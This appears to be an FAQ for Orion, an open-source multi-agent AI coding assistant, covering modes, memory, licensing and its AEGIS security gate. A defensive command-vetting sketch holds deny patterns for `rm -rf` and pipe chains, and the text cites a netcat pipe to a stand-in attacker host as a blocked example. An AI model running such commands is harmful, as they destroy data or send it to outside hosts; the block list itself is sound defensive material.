Orion is an open-source, multi-agent AI coding assistant. It uses three specialized agents (Builder, Reviewer, Governor) to generate, review, and govern code changes. Unlike single-shot AI tools, Orion has persistent memory and learns from your feedback over time.
Key differentiators:
- Multi-agent deliberation -- Three agents collaborate instead of one
- Persistent memory -- Learns across sessions, projects, and time
- AEGIS governance -- Hardened security gate prevents unsafe operations
- 11 LLM providers -- Use any provider, including local Ollama
- Self-hosted -- Runs entirely on your machine
Yes. Orion is released under AGPL-3.0 and is free to use, modify, and distribute under those terms. You still need to pay for LLM API usage (OpenAI, Anthropic, etc.) unless you use Ollama (free, local).
You need at least one LLM provider. Options:
- Paid: OpenAI, Anthropic, Google, Groq, Mistral, etc.
- Free (local): Ollama -- no API key, runs on your hardware
Orion can work with any programming language. It has enhanced support for:
- Python -- AST analysis, syntax validation, import checking
- JavaScript/TypeScript -- tree-sitter parsing
- Other languages -- General code analysis and generation
Your code is sent to the LLM provider you choose (OpenAI, Anthropic, etc.) for processing. If you want complete privacy, use Ollama -- everything stays on your machine.
Orion itself does not collect, transmit, or store any telemetry.
Only if:
- You are in `pro` or `project` mode
- AEGIS validates the operation
- You approve the change (in `pro` mode)
In safe mode, Orion cannot modify or delete any files.
Only in `project` mode, and only allowlisted commands. AEGIS blocks dangerous patterns like `rm -rf`, shell injection, and pipe chains.
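As a rough illustration of allowlist-plus-pattern vetting (the command names, patterns, and function below are assumptions for the sketch, not AEGIS internals):

```python
import re
import shlex

# Hypothetical allowlist and blocklist; the real AEGIS rules are richer.
ALLOWED_COMMANDS = {"pytest", "npm", "git", "ls"}
DANGEROUS_PATTERNS = [
    re.compile(r"\brm\s+-rf\b"),   # recursive delete
    re.compile(r"[|;&`$]"),        # pipe chains and shell-injection metacharacters
]

def is_command_allowed(command: str) -> bool:
    """Reject commands that match a dangerous pattern or whose
    executable is not on the allowlist."""
    if any(p.search(command) for p in DANGEROUS_PATTERNS):
        return False
    tokens = shlex.split(command)
    return bool(tokens) and tokens[0] in ALLOWED_COMMANDS
```

Under this scheme, `pytest tests/` passes, while `rm -rf /` and `ls | nc evil.example 80` are both rejected before they ever reach a shell.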
AEGIS (Autonomous Execution Governance and Integrity System) is Orion's security core. It validates every operation against seven invariants (v7.0.0): workspace confinement, mode enforcement, action scope, risk validation, command execution safety, external access control, and network access control.
See AEGIS documentation for full details.
No. AEGIS cannot be disabled, bypassed, or reconfigured by AI agents or users. This is by design.
> /workspace /path/to/your/project
| Mode | Can Read | Can Write | Can Execute |
|---|---|---|---|
| safe | Yes | No | No |
| pro | Yes | Yes (approval) | No |
| project | Yes | Yes | Yes (allowlist) |
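The mode matrix above can be expressed as a simple lookup; this is an illustrative sketch, not Orion's actual permission API:

```python
# Permission matrix mirroring the mode table; names are assumptions.
MODES = {
    "safe":    {"read": True, "write": False, "execute": False},
    "pro":     {"read": True, "write": True,  "execute": False},  # writes need approval
    "project": {"read": True, "write": True,  "execute": True},   # execute via allowlist only
}

def can(mode: str, action: str) -> bool:
    """Check whether the given mode permits read/write/execute."""
    return MODES[mode][action]
```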
> /settings provider openai
> /settings model gpt-4o
Yes. Configure per-agent models in `~/.orion/config.yaml`:

```yaml
agents:
  builder:
    provider: openai
    model: gpt-4o
  reviewer:
    provider: anthropic
    model: claude-3-5-sonnet-20241022
```

> /undo

Orion creates git savepoints before changes, so you can always revert.
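One plausible way to implement savepoints with plain git looks like this; the helper names are hypothetical, and Orion's actual savepoint mechanism may differ:

```python
import subprocess

def create_savepoint(workspace: str, label: str) -> str:
    """Commit the current tree so it can be restored later.
    Returns the commit SHA of the savepoint."""
    subprocess.run(["git", "add", "-A"], cwd=workspace, check=True)
    subprocess.run(
        ["git", "commit", "--allow-empty", "-m", f"orion-savepoint: {label}"],
        cwd=workspace, check=True,
    )
    sha = subprocess.run(
        ["git", "rev-parse", "HEAD"], cwd=workspace,
        check=True, capture_output=True, text=True,
    ).stdout.strip()
    return sha

def undo_to(workspace: str, sha: str) -> None:
    """Restore the working tree to a previously recorded savepoint."""
    subprocess.run(["git", "reset", "--hard", sha], cwd=workspace, check=True)
```

Because each savepoint is an ordinary commit, reverting is just a `git reset --hard` back to the recorded SHA.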
After Orion completes a task, you can rate it 1-5:
- 5 -- Excellent, exactly what I needed
- 4 -- Good, minor adjustments needed
- 3 -- Acceptable, could be better
- 2 -- Poor, significant issues
- 1 -- Bad, completely wrong
Ratings drive the learning system -- high ratings become success patterns, low ratings become anti-patterns.
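Conceptually, the rating-to-pattern mapping could be bucketed like this; the thresholds and function name are assumptions for illustration, not Orion internals:

```python
def classify_rating(rating: int) -> str:
    """Bucket a 1-5 rating into a learning signal (hypothetical thresholds)."""
    if not 1 <= rating <= 5:
        raise ValueError("rating must be between 1 and 5")
    if rating >= 4:
        return "success_pattern"   # reinforce this approach in future tasks
    if rating <= 2:
        return "anti_pattern"      # avoid this approach in future tasks
    return "neutral"               # acceptable, no strong signal either way
```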
Three tiers of memory:
- Session -- Current conversation (RAM, lost on exit)
- Project -- Workspace-specific patterns (JSON, days to weeks)
- Institutional -- Cross-project wisdom (SQLite, months to years)
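A lookup across the three tiers would naturally check the most specific tier first. The sketch below mirrors the backends listed above (RAM dict, JSON file, SQLite); the class, file names, and schema are assumptions for illustration:

```python
import json
import sqlite3
from pathlib import Path

class TieredMemory:
    """Illustrative three-tier memory: session -> project -> institutional."""

    def __init__(self, workspace: Path, home: Path):
        self.session: dict = {}  # RAM only, lost on exit
        self.project_file = workspace / ".orion" / "memory" / "patterns.json"
        self.db = sqlite3.connect(home / ".orion" / "institutional.db")
        self.db.execute(
            "CREATE TABLE IF NOT EXISTS patterns (key TEXT PRIMARY KEY, value TEXT)"
        )

    def get(self, key: str):
        if key in self.session:                     # 1. session tier
            return self.session[key]
        if self.project_file.exists():              # 2. project tier (JSON)
            data = json.loads(self.project_file.read_text())
            if key in data:
                return data[key]
        row = self.db.execute(                      # 3. institutional tier (SQLite)
            "SELECT value FROM patterns WHERE key = ?", (key,)
        ).fetchone()
        return row[0] if row else None
```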
- Project memory: `.orion/memory/` in each workspace
- Institutional memory: `~/.orion/institutional.db`
Yes:
> /memory clear session # Clear current session
> /memory clear project # Clear project patterns
> /memory clear institutional # Clear all learned patterns
- Session memory: No (current conversation only)
- Project memory: No (per-workspace)
- Institutional memory: Yes (shared across all projects)
- Start the API server: `uvicorn orion.api.server:app --port 8001`
- Start the web frontend: `cd orion-web && npm run dev`
- Open http://localhost:3001
Ensure the API server is running and the port matches the .env.local configuration. See Troubleshooting.
Under AGPL-3.0, you must share your modifications. For proprietary use without AGPL obligations, contact info@phoenixlink.co.za for a commercial license.
AGPL-3.0 requires that users of your SaaS have access to the source code. For SaaS without this requirement, you need a commercial license.
Yes. All contributions require a signed Contributor License Agreement. See CLA.md.
Common causes:
- LLM latency -- Cloud providers add network latency. Try Ollama for local inference.
- Table of Three -- Multi-agent deliberation takes roughly 3x as long as a single call. Disable with `enable_table_of_three: false` for speed.
- Large codebase -- Repository mapping takes time on large projects.
- Use a faster model (GPT-3.5-turbo, Groq's Llama 3)
- Disable Table of Three for simple tasks
- Use Ollama for zero network latency
- Reduce `max_tokens`
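Combined, those tips might look like this in `~/.orion/config.yaml`. The placement of the keys, and everything beyond `enable_table_of_three` and `max_tokens`, is an assumption for illustration:

```yaml
# Speed-oriented settings (key placement is an assumption)
enable_table_of_three: false   # skip multi-agent deliberation for simple tasks
max_tokens: 1024               # shorter responses, faster generation
agents:
  builder:
    provider: groq             # a fast provider from the list above
    model: llama3-70b-8192     # hypothetical model choice
```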
See CONTRIBUTING.md. Key steps:
- Fork the repository
- Sign the CLA
- Create a feature branch
- Submit a pull request
Do not use GitHub Issues for security vulnerabilities.
Email: info@phoenixlink.co.za
Next: Troubleshooting | Getting Started